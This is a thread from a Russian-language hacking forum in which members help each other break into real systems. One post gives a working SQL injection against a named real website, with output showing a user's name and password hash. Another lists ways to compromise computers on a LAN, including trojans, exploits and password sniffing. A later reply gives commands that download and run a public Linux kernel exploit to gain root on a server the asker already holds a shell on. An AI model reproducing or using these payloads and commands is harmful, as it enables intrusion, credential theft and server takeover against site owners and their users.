10.12.2009, 03:45
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
nightmare007, в куке хранится время, она не фильтруется, из-за этого ошибка. Скуля там врят ли, максимум XSS.
|
|
|
10.12.2009, 10:22
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами:
9520453
Репутация:
124
|
|
Ребят, помогите докрутить:
Код:
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'
С кавычкой ошибка есть, но количество полей не подобрать, а без кавычки вообще ноль реакции на что-либо. Есть подозрение, что она слепая. |
|
|
|
10.12.2009, 11:49
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Сообщение от keng
Ребят, помогите докрутить:
Код:
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'
С кавычкой ошибка есть, но количество полей не подобрать, а без кавычки вообще ноль реакции на что-либо. Есть подозрение, что она слепая.
Код:
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Duplicate column name ' 5.0.51a-24+lenny2'
Код:
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((select+concat_ws(0x3a,nickname,password)+from+users+limit+1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((select+concat_ws(0x3a,nickname,password)+from+users+limit+1),14)e)b)a)/**/and/**/'1'='1
Duplicate column name ' snakeye:2a63eca1020db4020c46be9b5dc8de4467d00912'
__________________
Feci, quod potui. Faciant meliora potentes.
Последний раз редактировалось Ded MustD!e; 10.12.2009 в 11:54..
|
|
|
|
10.12.2009, 11:44
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Можно крутить и как слепую. Там многострочный запрос
|
|
|
|
10.12.2009, 17:03
|
|
Новичок
Регистрация: 10.12.2009
Сообщений: 2
С нами:
8642003
Репутация:
0
|
|
Как взломать комп по LAN.
P.S. Спрашиваю чисто в учебных целях)))
|
|
|
|
10.12.2009, 17:43
|
|
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
С нами:
10019906
Репутация:
3702
|
|
Сообщение от Jessi Parker
Как взломать комп по LAN.
P.S. Спрашиваю чисто в учебных целях)))
1 Запустить троян на удалённый комп
- найти приват трой или купить его билд.
- послать ссылку с ****** / либо тупо впарить.
2 Использовать Сплоиты
- найти свежую дырку (в баг листах)
- ну и естественно придётся порты сканить на наличие уязвимых сервисов.
3 Сканеры расшаренных ресурсов + сканеры портов и т.п.
- берём сканер заряжаем свой диапазон и в путь. Есть p2p-сеть значит многие расшарили свои диски.
4 Снифание трафика.
- вешаем снифер и ловим пароли.
5 Можно взломать роутер.
|
|
|
|
10.12.2009, 20:41
|
|
Новичок
Регистрация: 10.12.2009
Сообщений: 2
С нами:
8642003
Репутация:
0
|
|
Сообщение от Solide Snake
1 Запустить троян на удалённый комп
- найти приват трой или купить его билд.
- послать ссылку с ****** / либо тупо впарить.
2 Использовать Сплоиты
- найти свежую дырку (в баг листах)
- ну и естественно придётся порты сканить на наличие уязвимых сервисов.
3 Сканеры расшаренных ресурсов + сканеры портов и т.п.
- берём сканер заряжаем свой диапазон и в путь. Есть p2p-сеть значит многие расшарили свои диски.
4 Снифание трафика.
- вешаем снифер и ловим пароли.
5 Можно взломать роутер.
Спс, половину не понял. Дальше буду Гуглить.
|
|
|
|
10.12.2009, 17:44
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
С нами:
8688843
Репутация:
10
|
|
Есть шелл на сервер. Нада получить рута. Беру этот сплойт:
http://www.woneninjeelement.nl/images/stories/2.4.x%20and%202.6.x.txt (рутать надо не этот сайт)
При копмиляции выдаёт кучу ошибок  Может нужно сплойт подправить, хз ядро - Linux 2.6.18 . Подскажите что можно сделать... мб нужно другой сплойт?
Последний раз редактировалось [Forest]; 10.12.2009 в 17:48..
|
|
|
|
10.12.2009, 17:57
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Покажи что выводит данная команда.
Если ядро обновлено до 13 августа этого года, то используй эксплоит sock_sendpage - http://milw0rm.com/exploits/9641
Юзать примерно так:
Код:
cd /tmp
mkdir my
chmod 777 my
cd my
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
id
|
|
|
|
10.12.2009, 18:03
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
С нами:
8688843
Репутация:
10
|
|
Сообщение от mailbrush
Покажи что выводит данная команда.
Если ядро обновлено до 13 августа этого года, то используй эксплоит sock_sendpage - http://milw0rm.com/exploits/9641
Юзать примерно так:
Код:
cd /tmp
mkdir my
chmod 777 my
cd my
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
id
./run
mmap: Permission denied
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Forest]](/avatars/avatar103206.jpg?1746830){kind=avatar}
![Аватар для [Forest]](/avatars/avatar103206.jpg?1746872){kind=avatar}
Похожие темы
Комбинированный вид
